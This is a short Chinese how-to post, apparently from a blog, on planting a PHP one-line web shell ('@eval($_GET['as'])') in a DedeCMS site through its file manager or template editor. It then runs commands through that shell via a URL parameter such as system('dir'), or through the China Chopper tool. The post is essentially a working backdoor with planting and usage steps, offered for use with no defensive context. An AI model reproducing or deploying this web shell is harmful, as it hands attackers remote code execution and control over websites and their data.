一句话:
<?php @eval($_GET['as']); ?> //as是形式参数
位置:
1、模块——模块管理——文件管理器
2、模板——模板管理——标签源码管理
3、、、
进入,选择.PHP文件,插入一句话
使用:
1、在网页上,、、、/dede/ad_add.php?as=system('dir'); //可以显示该目录下的文件、文件大小以及字节数
2、利用工具(菜刀),可以详细浏览目录下的文件
本文介绍了一种通过在特定PHP应用程序中插入恶意代码来实现远程代码执行的方法。具体操作包括在模块管理和模板管理等处植入代码,并展示了如何利用这些植入的代码进行文件系统的探测。
1879
1830

被折叠的 条评论
为什么被折叠?